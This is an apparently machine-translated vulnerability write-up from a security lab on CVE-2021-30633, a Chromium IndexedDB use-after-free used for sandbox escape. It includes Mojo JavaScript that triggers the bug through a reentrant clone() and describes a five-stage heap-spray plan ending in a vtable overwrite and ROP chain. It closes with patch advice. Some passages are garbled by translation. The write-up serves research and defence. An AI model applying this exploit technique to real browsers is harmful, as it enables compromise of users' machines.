preface

Recently, @HungTT28 publicized his fullchian exploitation in his blog, among which sandbox escape used CVE-2021-30633. Wuheng Laboratory has also written related exploitation of this vulnerability before, and some inspiration was given after the blog article was published. The following will share some of Wuheng Laboratory’s experience on CVE-2021-30633 vulnerability, hoping to learn and exchange with the industry.

Root Case

Let’s take a look at the generation principle of vulnerability first, starting from the patch, among which the most important is the following function:

bool IsAcceptingRequests() { return ! is_commit_pending_ && state_ ! = COMMITTING && state_ ! = FINISHED; }Copy the code

The patch adds this judgment to each DatabaseImpl and TransactionImpl interface, preventing transactions in the case of this and FINISHED states from executing, The converse means that continuing a new transaction between these two states will lead to vulnerabilities.

“FINISHED” (literally “FINISHED”) doesn’t have a good point to start with (right), so we focus more on “FINISHED” (right), The state can through IndexedDBTransaction: : Commit () and TransactionImpl: : Commit () these two functions to set up, there is an interesting call chain:

IndexedDBTransaction::Commit --> IndexedDBBackingStore::Transaction::CommitPhaseOne --> IndexedDBBackingStore::Transaction::WriteNewBlobs
Copy the code

Blob_storage or file_system_access is called to write the committed data to disk as follows:

        case IndexedDBExternalObject::ObjectType::kFile:
        case IndexedDBExternalObject::ObjectType::kBlob: {
          if (entry.size() == 0)
            continue;
          // If this directory creation fails then the WriteBlobToFile call
          // will fail. So there is no need to special-case handle it here.
          base::FilePath path = GetBlobDirectoryNameForKey(
              backing_store_->blob_path_, database_id_, entry.blob_number());
          backing_store_->filesystem_proxy_->CreateDirectory(path);
          // TODO(dmurph): Refactor IndexedDBExternalObject to not use a
          // SharedRemote, so this code can just move the remote, instead of
          // cloning.
          mojo::PendingRemote<blink::mojom::Blob> pending_blob;
          entry.remote()->Clone(pending_blob.InitWithNewPipeAndPassReceiver());

          // Android doesn't seem to consistently be able to set file
          // modification times. The timestamp is not checked during reading
          // on Android either. https://crbug.com/1045488
          absl::optional<base::Time> last_modified;
          blob_storage_context->WriteBlobToFile(
              std::move(pending_blob),
              backing_store_->GetBlobFileName(database_id_,
                                              entry.blob_number()),
              IndexedDBBackingStore::ShouldSyncOnCommit(durability_),
              last_modified, write_result_callback);
          break;
        }
Copy the code
case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle: { if (! entry.file_system_access_token().empty()) continue; // TODO(dmurph): Refactor IndexedDBExternalObject to not use a // SharedRemote, so this code can just move the remote, instead of // cloning. mojo::PendingRemote<blink::mojom::FileSystemAccessTransferToken> token_clone; entry.file_system_access_token_remote()->Clone( token_clone.InitWithNewPipeAndPassReceiver()); backing_store_->file_system_access_context_->SerializeHandle( std::move(token_clone), base::BindOnce( [](base::WeakPtr<Transaction> transaction, IndexedDBExternalObject* object, base::OnceCallback<void( storage::mojom::WriteBlobToFileResult)> callback, const std::vector<uint8_t>& serialized_token) { // |object| is owned by |transaction|, so make sure // |transaction| is still valid before doing anything else. if (! transaction) return; if (serialized_token.empty()) { std::move(callback).Run( storage::mojom::WriteBlobToFileResult::kError); return; } object->set_file_system_access_token(serialized_token); std::move(callback).Run( storage::mojom::WriteBlobToFileResult::kSuccess); }, weak_ptr_factory_.GetWeakPtr(), &entry, write_result_callback)); break; }Copy the code

With Clone, we can re-import js and insert some basic knowledge. We will start with the following example, which is a common binding operation:

var fileAccessPtr = new blink.mojom.FileSystemAccessTransferTokenPtr();
var fileAccessRequest = mojo.makeRequest(fileAccessPtr);
Mojo.bindInterface(blink.mojom.FileSystemAccessTransferToken.name, fileAccessRequest.handle);
Copy the code

Here’s a graph to help you understand:

FileAccessPtr and fileAccessRequest represent the client and service side of the interface connection respectively, which is implemented via mojo.makerequest.

Mojo. makeRequest creates a Message Pipe that fills one end of the pipe with the output parameter (either InterfacePtrInfo or Interface Pointer) and returns the other end wrapped in the InterfaceRequest instance.

  // |output| could be an interface pointer, InterfacePtrInfo or
  // AssociatedInterfacePtrInfo.
  function makeRequest(output) {
    if (output instanceof mojo.AssociatedInterfacePtrInfo) {
      var {handle0, handle1} = internal.createPairPendingAssociation();
      output.interfaceEndpointHandle = handle0;
      output.version = 0;

      return new mojo.AssociatedInterfaceRequest(handle1);
    }

    if (output instanceof mojo.InterfacePtrInfo) {
      var pipe = Mojo.createMessagePipe();
      output.handle = pipe.handle0;
      output.version = 0;

      return new mojo.InterfaceRequest(pipe.handle1);
    }

    var pipe = Mojo.createMessagePipe();
    output.ptr.bind(new mojo.InterfacePtrInfo(pipe.handle0, 0));
    return new mojo.InterfaceRequest(pipe.handle1);
  }
Copy the code

Mojo.bindInterface calls the bindInterface function

//third_party/blink/renderer/core/mojo/mojo.cc
// static
void Mojo::bindInterface(ScriptState* script_state,
                         const String& interface_name,
                         MojoHandle* request_handle,
                         const String& scope) {
  std::string name = interface_name.Utf8();
  auto handle =
      mojo::ScopedMessagePipeHandle::From(request_handle->TakeHandle());

  if (scope ==  process ) {
    Platform::Current()->GetBrowserInterfaceBroker()->GetInterface(
        mojo::GenericPendingReceiver(name, std::move(handle)));
    return;
  }

  ExecutionContext::From(script_state)
      ->GetBrowserInterfaceBroker()
      .GetInterface(name, std::move(handle));
}
Copy the code

Create an Implement that corresponds to the MoJO interface by calling the bind function registered with Map ->Add via GetInterface from the BrowserInterfaceBroker established between Render and Browser. It is then bound to the Receiver. This allows the browser code to be called from Render’s remote.

So how do you implement reentrant JS?

function FileSystemAccessTransferTokenImpl() { this.binding = new mojo.Binding(blink.mojom.FileSystemAccessTransferToken, this); } FileSystemAccessTransferTokenImpl. Prototype = {clone: async (arg0) = > {/ / custom}}; var fileAccessPtr = new blink.mojom.FileSystemAccessTransferTokenPtr(); var fileAccessImpl = new FileSystemAccessTransferTokenImpl(); var fileAccessRequest = mojo.makeRequest(fileAccessPtr); fileAccessImpl.binding.bind(fileAccessRequest);Copy the code

First you need to implement an fileAccessImpl in the Render layer (i.e. Js), then customize the clone method you want, Bind the InterfaceRequest returned by Mojo. makeRequest to fileAccessImpl.

// --------------------------------------------------------------------------- // |request| could be omitted and passed into bind() later. // // Example: // // // FooImpl implements mojom.Foo. // function FooImpl() { ... } // FooImpl.prototype.fooMethod1 = function() { ... } // FooImpl.prototype.fooMethod2 = function() { ... } // // var fooPtr = new mojom.FooPtr(); // var request = makeRequest(fooPtr); // var binding = new Binding(mojom.Foo, new FooImpl(), request); // fooPtr.fooMethod1(); function Binding(interfaceType, impl, requestOrHandle) { this.interfaceType_ = interfaceType; this.impl_ = impl; this.router_ = null; this.interfaceEndpointClient_ = null; this.stub_ = null; if (requestOrHandle) this.bind(requestOrHandle); }... Binding.prototype.bind = function(requestOrHandle) { this.close(); var handle = requestOrHandle instanceof mojo.InterfaceRequest ? requestOrHandle.handle : requestOrHandle; if (! (handle instanceof MojoHandle)) return; this.router_ = new internal.Router(handle); this.stub_ = new this.interfaceType_.stubClass(this.impl_); this.interfaceEndpointClient_ = new internal.InterfaceEndpointClient( this.router_.createLocalEndpointHandle(internal.kPrimaryInterfaceId), this.stub_, this.interfaceType_.kVersion); this.interfaceEndpointClient_ .setPayloadValidators([ this.interfaceType_.validateRequest]); };Copy the code

Instead of sending a PendingReceiver to Browser from Render and calling the interface Implemention on the Browser side, you get to call the code in Render from Render.

Then we pass remote to external_Object

var external_object = new blink.mojom.IDBExternalObject();
external_object.fileSystemAccessToken = fileAccessPtr;
Copy the code

After IndexedDBBackingStore: : Transaction: : WriteNewBlobs by entry. File_system_access_token_remote () to obtain the incoming remote, The clone call will then be the JS code we defined, which implements reentrant JS.

entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());
Copy the code

Here, we define clone as follows:

FileSystemAccessTransferTokenImpl.prototype = { clone: async (arg0) => { // IndexedDBBackingStore::Transaction::WriteNewBlobs is waiting for writing complete, so we can hookup COMMITTING state_ of transition // replace key/value in object store to delete the external object print( === clone === ); var value = new blink.mojom.IDBValue(); value.bits = [0x41, 0x41, 0x41, 0x41]; value.externalObjects = []; var key = new blink.mojom.IDBKey(); key.string = new mojoBase.mojom.String16(); key.string.data = key ; var mode = blink.mojom.IDBPutMode.AddOrUpdate; var index_keys = []; idbTransactionPtr.put(object_store_id, value, key, mode, index_keys); // commit force put operation idbTransactionPtr.commit(0); for(let i = 0; i < 0x1000; i++){ var a=new Blob([heap1]); blob_list.push(a); } done = true; // get token for file handle, control-flow comeback to callback within cached external object ==> UAF fileAccessHandlePtr.transfer(arg0); }};Copy the code

Here’s one caveat:

          entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());

          backing_store_->file_system_access_context_->SerializeHandle
Copy the code

Clone is called asynchronously, so we need to determine the order of execution according to the actual situation.

The main causes of UAF are as follows, which can be divided into three parts:

1. Causes of UAF

The release of external_Objects involved two PUT requests, which occurred in the second PUT of clone reentrant.

The call chain to release external_objects looks like this:

TransactionImpl: : Put - > IndexedDBDatabase: : PutOperation - > IndexedDBBackingStore: : PutRecord - > IndexedDBBackingStore::Transaction::PutExternalObjectsIfNeededCopy the code

TransactionImpl::Put: params stores object_store_id, value, key, mode, index_keys that we passed in. The key parts of the offset are as follows:

Params ->object_store_id offset: 0x0 Params ->value offset: 0x8 to 0x30 Params ->key offset: 0x38Copy the code

Params ->value is of type IndexedDBValue

struct CONTENT_EXPORT IndexedDBValue {
......
  std::string bits;
  std::vector<IndexedDBExternalObject> external_objects;
};
Copy the code

Since we are going to release external_Object later, we typed a log here to output its address and size. This 184 is the size of the heap spray we are going to use later.

This is the second clone call. We pass external_Object empty in the second put, and the bits (the key that will be used later) are the same as in the first

Free occurs here, and since the external_object we passed in the second time is empty, it will go to external_object_change_map_. Erase. Since object_store_data_key is the same in both cases, The external_Object passed in the first time will be released.

Status IndexedDBBackingStore::Transaction::PutExternalObjectsIfNeeded( int64_t database_id, const std::string& object_store_data_key, std::vector<IndexedDBExternalObject>* external_objects) { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); if (! external_objects || external_objects->empty()) { external_object_change_map_.erase(object_store_data_key); //free here!! incognito_external_object_map_.erase(object_store_data_key); . } class IndexedDBExternalObjectChangeRecord { ........ private: std::string object_store_data_key_; std::vector<IndexedDBExternalObject> external_objects_ ; };Copy the code

Object_store_data_key debugged PutExternalObjectsIfNeeded twice, you can see is the same.

2, Clone commit role

Since Clone was called in the last COMMIT, we are in the commit process of the last transaction. If only put request is made at this time, the transaction will not be processed directly, but the last operation will be processed first. See the figure below:

If you want to leak the token address, you need to put before set_file_system_access_token. Commit is used to force the put. Can achieve the effect that we want.

A new question arises: Does a clone reentrant call not follow up with commit?

The answer is no. Let’s look at the following code:

IndexedDBTransaction::RunTasks() { ....... // If there are no pending tasks, we haven't already committed/aborted, // and the front-end requested a commit, it is now safe to do so. if (! HasPendingTasks() && state_ == STARTED && is_commit_pending_) { processing_event_queue_ = false; // This can delete |this|. leveldb::Status result = Commit(); //IndexedDBTransaction::Commit() if (! result.ok()) return {RunTasksResult::kError, result}; }... }Copy the code

Can be seen only when the state_ = = STARTED calling IndexedDBTransaction: : Commit, and then to call

WriteNewBlobs, when we call commit the second time, state_ is already right of the case.

First commit:

Second commit:

3, the role of transfer

First let’s look at the call chain:

FileSystemAccessManagerImpl::SerializeHandle --> FileSystemAccessManagerImpl::ResolveTransferToken --> FileSystemAccessManagerImpl::DoResolveTransferToken  --> FileSystemAccessManagerImpl::DoResolveTransferToken --> FileSystemAccessManagerImpl::DidResolveForSerializeHandle 
Copy the code

As you can see, the DoResolveTransferToken call requires a token from transfer_tokens_ to finally go to the SerializeHandle callback

void FileSystemAccessManagerImpl::DoResolveTransferToken( mojo::Remote<blink::mojom::FileSystemAccessTransferToken>, ResolvedTokenCallback callback, const base::UnguessableToken& token) { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); auto it = transfer_tokens_.find(token); if (it == transfer_tokens_.end()) { std::move(callback).Run(nullptr); } else { std::move(callback).Run(it->second.get()); }}Copy the code

So we need to call in the clone fileAccessHandlePtr. Transfer (arg0);

void FileSystemAccessManagerImpl::DidResolveForSerializeHandle( SerializeHandleCallback callback, FileSystemAccessTransferTokenImpl* resolved_token) { if (! resolved_token) { std::move(callback).Run({}); return; }... std::string value; bool success = data.SerializeToString(&value); DCHECK(success); std::vector<uint8_t> result(value.begin(), value.end()); std::move(callback).Run(result); }Copy the code

After the incoming DoResolveTransferToken FileSystemAccessTransferTokenImpl processed into the result, It is serialized_token in object->set_file_system_access_token(serialized_token).

backing_store_->file_system_access_context_->SerializeHandle( std::move(token_clone), base::BindOnce( [](base::WeakPtr<Transaction> transaction, IndexedDBExternalObject* object, base::OnceCallback<void( storage::mojom::WriteBlobToFileResult)> callback, const std::vector<uint8_t>& serialized_token) { // |object| is owned by |transaction|, so make sure // |transaction| is still valid before doing anything else. if (! transaction) return; if (serialized_token.empty()) { std::move(callback).Run( storage::mojom::WriteBlobToFileResult::kError); return; } object->set_file_system_access_token(serialized_token); std::move(callback).Run( storage::mojom::WriteBlobToFileResult::kSuccess); }, weak_ptr_factory_.GetWeakPtr(), &entry, write_result_callback)); break;Copy the code

One thing to note here:

In the SerializeToString serialization process, an 8-byte content is calculated to fill the token first, followed by our file_name. Therefore, when using file_name to control the token size, note that the token size will be larger file_name0x8.

summary

The above is divided into three parts, let’s integrate the above content:

  • We can use clone reentrant js to call put twice in Clone.
  • If an empty external_object with the same key is passed in the second PUT, the external_object of the first put will be released.
  • The token is passed to set_file_system_access_token via transer.
  • Commit to execution of PutExternalObjectsIfNeeded before set_file_system_access_token jumped the queue
  • After applying for the external_object that was removed from free via bloB, set_file_system_access_token will write the token to our BLOB. After reading the BLOB, we can obtain the begin address of the token (vector).

using

The utilization of vulnerabilities is divided into five heap ejections, and I will introduce each heap ejection in turn below:

First stack spray:

The target of the heap spray is the external_object that has been released. Blob is sprayed to apply for the memory space of the external_object, and set_file_system_access_token is called to write the token into the memory

void IndexedDBExternalObject::set_file_system_access_token(
    std::vector<uint8_t> token) {
  DCHECK_EQ(object_type_, ObjectType::kFileSystemAccessHandle);
  file_system_access_token_ = std::move(token);
}
Copy the code

Set_file_system_access_token before:

After the set_file_system_access_token:

Then read the BLOB to get the address of the red part of the graph.

Second stack spray:

This time, fill in the blob from leak’s first blob. Since vector overloads the = operator, non-zero assignments will release the token.

The main purpose of releasing a token is that its size and content can be controlled by file_name. This is equivalent to converting the EXTERNal_Object UAF to the token UAF.

Third stack spray:

When a new BLOB is registered using the RegisterFromStream interface, new BlobDataItem is called.

BlobRegistryImpl::RegisterFromStream --> BlobBuilderFromStream::Start --> BlobBuilderFromStream::AllocateMoreMemorySpace  --> BlobDataItem::CreateBytesDescription --------------------------------------------------------------------------- void BlobBuilderFromStream::AllocateMoreMemorySpace( uint64_t length_hint, mojo::PendingAssociatedRemote<blink::mojom::ProgressClient> progress_client, mojo::ScopedDataPipeConsumerHandle pipe) { .......... std::vector<scoped_refptr<ShareableBlobDataItem>> chunk_items; while (length_hint > 0) { const auto block_size = std::min<uint64_t>(kMemoryBlockSize, length_hint); chunk_items.push_back(base::MakeRefCounted<ShareableBlobDataItem>( BlobDataItem::CreateBytesDescription(block_size), ShareableBlobDataItem::QUOTA_NEEDED)); length_hint -= block_size; }... } --------------------------------------------------------------------------- scoped_refptr<BlobDataItem> BlobDataItem::CreateBytesDescription( size_t length) { return base::WrapRefCounted( new BlobDataItem(Type::kBytesDescription, 0, length)); }Copy the code

BlobDataItem stores datA_Handle_, and our ultimate goal is to placeholder BlobDataItem to modify datA_Handle_, thereby hijacking the execution flow by overwriting the DataHandle’s virtual function table.

class COMPONENT_EXPORT(STORAGE_BROWSER) BlobDataItem
    : public base::RefCounted<BlobDataItem> {

    ........

  Type type_;
  uint64_t offset_;
  uint64_t length_;

  std::vector<uint8_t> bytes_;    // For Type::kBytes.
  base::FilePath path_;           // For Type::kFile.
  FileSystemURL filesystem_url_;  // For Type::kFileFilesystem.
  base::Time
      expected_modification_time_;  // For Type::kFile and kFileFilesystem.

  scoped_refptr<DataHandle> data_handle_;           // For kReadableDataHandle.
  scoped_refptr<ShareableFileReference> file_ref_;  // For Type::kFile

  scoped_refptr<FileSystemContext>
      file_system_context_;  // For Type::kFileFilesystem.
};
Copy the code

We can log the size of the current version of BlobDataItem. Since the size of the token can be controlled by us, we need to keep it the same size as the BlobDataItem for heap spraying later.

The current environment in use, BlobDataItem, has a size of 424, so file_name has a size of 424-8 (the reason for -8 is mentioned above).

In the second heap spray we get a free token of size 424, at which point we can spray the BlobDataItem into the token by calling RegisterFromStream.

Fourth stack spray:

This heap spray process is the same as the second one. The main purpose is to release the token that is already BlobDataItem again, which is equivalent to obtaining a free BlobDataItem.

Fifth stack spray:

This time, we can spray BlobDataItem directly. In this case, we can complete the attack by placing the ROP chain in the BLOB to overwrite the virtual function table of DataHandle. Then overwrite the pointer at offset 0x190 (datA_handle_) to the address of the gadget -0x10.

The BlobImpl::ReadSideData interface (BlobImpl::ReadSideData) is used to call the virtual function after overwriting the BlobImpl::ReadSideData interface (BlobImpl::ReadSideData). The BlobImpl: ReadSideData interface (BlobImpl::ReadSideData) is used to call the virtual function.

void BlobImpl::ReadSideData(ReadSideDataCallback callback) { handle_->RunOnConstructionComplete(base::BindOnce( [](BlobDataHandle handle, ReadSideDataCallback callback, BlobStatus status) { if (status ! = BlobStatus::DONE) { DCHECK(BlobStatusIsError(status)); std::move(callback).Run(absl::nullopt); return; } auto snapshot = handle.CreateSnapshot(); // Currently side data is supported only for blobs with a single entry. const auto& items = snapshot->items(); if (items.size() ! = 1) { std::move(callback).Run(absl::nullopt); return; } const auto& item = items[0]; if (item->type() ! = BlobDataItem::Type::kReadableDataHandle) { std::move(callback).Run(absl::nullopt); return; } int32_t body_size = item->data_handle()->GetSideDataSize(); if (body_size == 0) { std::move(callback).Run(absl::nullopt); return; } item->data_handle()->ReadSideData(base::BindOnce( [](ReadSideDataCallback callback, int result, mojo_base::BigBuffer buffer) { if (result < 0) { std::move(callback).Run(absl::nullopt); return; } std::move(callback).Run(std::move(buffer)); }, std::move(callback))); }, *handle_, std::move(callback))); }Copy the code

Because the layout of the ROP chain has been given in exp, I will not focus on the analysis.

Safety recommendations

  • Google has officially provided the following patch for the vulnerability:

    • Chromium-review.googlesource.com/c/chromium/…
    • Chromium-review.googlesource.com/c/chromium/…
    • Chromium-review.googlesource.com/c/chromium/…
  • This vulnerability can be avoided by patching or updating to secure version 93.0.4577.82 or later.

conclusion

  • On the whole, the utilization of this vulnerability is not ideal in terms of stability and utilization time due to too many heap spraying times. However, we can still learn a lot from the idea of utilization, which is a very clever utilization.
  • Without constant lab is dedicated to byte to beat the escort’s products and business, also third-party applications are of the utmost importance to the influence of business security, in the testing company at the same time, the safety of the third party applications without constant laboratory also focus on setting up the holes in the third-party applications relief mechanism, and will continue to share with the industry research results, help enterprise business to avoid safety risks, We also hope to cooperate with peers in the industry and make contributions to the development of the network security industry.

References:

Starlabs. Sg/blog / 2022/0…